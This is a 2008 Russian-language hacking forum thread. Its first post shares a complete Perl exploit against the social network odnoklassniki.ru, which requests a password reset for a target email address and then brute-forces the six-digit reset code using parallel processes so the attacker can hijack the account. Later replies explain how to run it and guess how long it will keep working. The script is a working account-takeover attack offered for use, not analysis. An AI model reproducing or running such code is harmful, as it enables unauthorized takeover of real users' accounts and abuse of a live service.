эксплоит для одноклассники.ру от Rst/ghc

Discussion in 'Веб-уязвимости' started by NFM, 26 May 2008.

  1. NFM

    NFM Reservists Of Antichat

    Joined:
    16 Jan 2006
    Messages:
    308
    Likes Received:
    191
    Reputations:
    22
    Все слышали новость что 26 в паблик уидет сплоит от известной команды. Сплоит раздали на ирк канале рст где-то в 4 часа. Вот сам сплоит

    PHP:
    #!/usr/bin/perl
    use LWP::UserAgent;
     
    print 
    qq(
       ,
    __                    __,                       
       \\ \\                    / /                     
        \\ \\     
    __      _    / /                      
           \\  .
    ___/\\:::* /\\ /                         
              |
    _____\\  |/  \\                         
             /<>
    //,./      /       _________                             
            
    /      /      /  \\    |  RST                 
           
    /      /.,\\\\<>/\\   \\   |   GHC                       
           
    \\      \\    /'  \\  /   |    UKT
            \\      \\  /     \\     |__\\xD____                         
             \\      \\/      /                           
           /  '''
    \\'''      /                               
        / /       \\   \\   / \\ \\                         
       / /         ___ \\ /   \\ \\                       
       *__                    __*
                   [preved odnoklassne4gi]
                     
    );
     
     
     
    if (!scalar(@ARGV)) {
        print "\[~\]Usage : ./$0 eMail {number of child procs}\n\n";
        exit();
    }
    if (-e "success") {
        print "\[-\] File \"success\" exists in your directory. Please rename it or remove.\n\n";
        exit();    
    }
     
    my $email="$ARGV[0]";
     
    if ($ARGV[1]) {
        my $MAX_PROCESSES=$ARGV[1];
    } else {
        my $MAX_PROCESSES=5;
    }
    my $DEBUG=0;
     
    my @pids;
    my $npids=0;
    my $restore=0;
    my $e;
     
    # first step - omg! I lost my password?!?!?!
    $ua=LWP::UserAgent->new();
    $page=$ua->post("http://odnoklassniki.ru/cdk/st.cmd/password/tkn/6544",["st.email"=>$email,"st.posted"=>"set"]);
    $page_content=$page->content();
    if ($page_content=~/st.email/) {
        print "\[-\] Please provide correct email address\n";
        exit();
    } else {
        print "\[+\] Repair password code send to $email\n";
    }
     
    # step number two - bruteforce code for repair password
    print "\[~\] Brutforce code for repair password\
    This process make take max ~ 18 hours to check all combinations\
    You need good internet channel and fast cpu\n";
    open(LOG_FILE,">>log");
    $not=1;
    for ($code=100000;$code<=999999;$code++) {
        if (-e "success") {
            print "DONE";
            exit();
        }
        if ($code==199999 && $not==1) {
            $cod="099999";
            $not=0;
            $code=100000;
        } elsif ($code=~/^1(\d+)$/ && $not==1) {
            $code=~/^1(\d+)$/;
            $cod="0$1";
        } else {
            $cod=$code;
        }
        if ($cod=~/^(\d+)000$/) {
            print "#";
        }
     
        my $pid;
        $pid=fork();
        if($pid>0){
         push(@pids,$pid);
         $npids++;
         if($npids>=$MAX_PROCESSES){
             for(1..($MAX_PROCESSES)){
              $wait_ret=wait();
              if($wait_ret>0){
                        $npids--;
                    }
                }
            }
            next;
        }elsif(undef $pid){
            print "fork error\n" if ($DEBUG);
            exit(0);
        }
        $p=$ua->post("http://www.odnoklassniki.ru/dk",["st.cmd"=>"passwordReset","st.email"=>$email,"st.confirmation-code"=>$cod,"st.posted"=>"set"]);
        $con=$p->content();
        if ($con=~/password.confirmation/) {
            print "$cod cached\n";
            print LOG_FILE "$cod cached\n";
            open(SUCCESS,">>success");
            print SUCCESS "\n############################\n";
            print SUCCESS "Yahooo! Congratulations! Code for password repair is - $cod\n";
            print SUCCESS "Go to http://www.odnoklassniki.ru//dk?st.cmd=passwordReset\n";
            print SUCCESS "Type your email ($email), your repair code ($cod) and set new password for your account.\n";
            print SUCCESS "############################\n";
            print "############################\n";
            print "Yahooo! Congratulations! Code for password repair is - $cod\n";
            print "Go to http://www.odnoklassniki.ru//dk?st.cmd=passwordReset\n";
            print "Type your email ($email), your repair code ($cod) and set new password for your account.\n";
            print "############################\n";
            close(SUCCESS);
        } else {
            print LOG_FILE "$cod failed\n";
        }
        exit();
    }
    close(LOG_FILE);
     
  2. k0lbasa

    k0lbasa Elder - Старейшина

    Joined:
    25 May 2008
    Messages:
    189
    Likes Received:
    131
    Reputations:
    -9
    как насчет инструкции)
     
  3. Zedobat

    Zedobat Elder - Старейшина

    Joined:
    24 Jul 2007
    Messages:
    145
    Likes Received:
    34
    Reputations:
    10
    пишешь путь к файлу а потом нужно мыло.

    Как я понял сплойт запрашивает восстановление пароля (первый шаг), и после брутит код для восстановления пароля (шаг второй). Для перебора всех комбинаций требуется около 18 часов.

    Ну а после проходим по ссылке пишем мыло ,код и новый пароль.
     
  4. Karantin

    Karantin Elder - Старейшина

    Joined:
    21 Dec 2007
    Messages:
    330
    Likes Received:
    146
    Reputations:
    24
    Я уже выложил в теме про эксплойт
    https://forum.antichat.ru/threadnav71241-1-10.html
     
  5. MaDfUn

    MaDfUn Elder - Старейшина

    Joined:
    2 Feb 2007
    Messages:
    28
    Likes Received:
    10
    Reputations:
    0
    Мдя...жалко что жить он будет недолго....
     
  6. k0lbasa

    k0lbasa Elder - Старейшина

    Joined:
    25 May 2008
    Messages:
    189
    Likes Received:
    131
    Reputations:
    -9
    по википедии я - скрипткидди))
    так что хотелось бы узнать поподробнее
     
  7. NFM

    NFM Reservists Of Antichat

    Joined:
    16 Jan 2006
    Messages:
    308
    Likes Received:
    191
    Reputations:
    22
    колбаса, ставь актив перл и запускай
     
  8. heks

    heks Banned

    Joined:
    24 Aug 2007
    Messages:
    713
    Likes Received:
    95
    Reputations:
    12
    интнрнсная приколюха хотя пока мне и ненужная
     
  9. Чиловег Ниоткудо

    Joined:
    24 May 2008
    Messages:
    23
    Likes Received:
    13
    Reputations:
    4
    потом (а это пару дней) она работать не будет...
     
  10. +toxa+

    +toxa+ Smack! SMACK!!!

    Joined:
    16 Jan 2005
    Messages:
    1,674
    Likes Received:
    1,029
    Reputations:
    1,228
    Как-то большего ожидал..)
     
    _________________________
    1 person likes this.
  11. otmorozok428

    otmorozok428 Banned

    Joined:
    19 Oct 2007
    Messages:
    127
    Likes Received:
    88
    Reputations:
    17
    Большее никто бы в паблик и не выложил - сами бы пользовались :)
     
  12. chekist

    chekist Elder - Старейшина

    Joined:
    14 Nov 2007
    Messages:
    215
    Likes Received:
    160
    Reputations:
    100
    админы потом бы спалил, 18 часов перебора
     
  13. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    вот.. ребят вам и паблик.. все брутят))) а супорт латает..)
     
  14. chekist

    chekist Elder - Старейшина

    Joined:
    14 Nov 2007
    Messages:
    215
    Likes Received:
    160
    Reputations:
    100
    наверно задосили :)
     
  15. GivioN

    GivioN Elder - Старейшина

    Joined:
    30 Mar 2008
    Messages:
    45
    Likes Received:
    10
    Reputations:
    0
    Ну а сейчас как? Работает?
     
    1 person likes this.
  16. T-REX

    T-REX New Member

    Joined:
    8 Sep 2004
    Messages:
    33
    Likes Received:
    0
    Reputations:
    0
    Хорошо, если бы работал!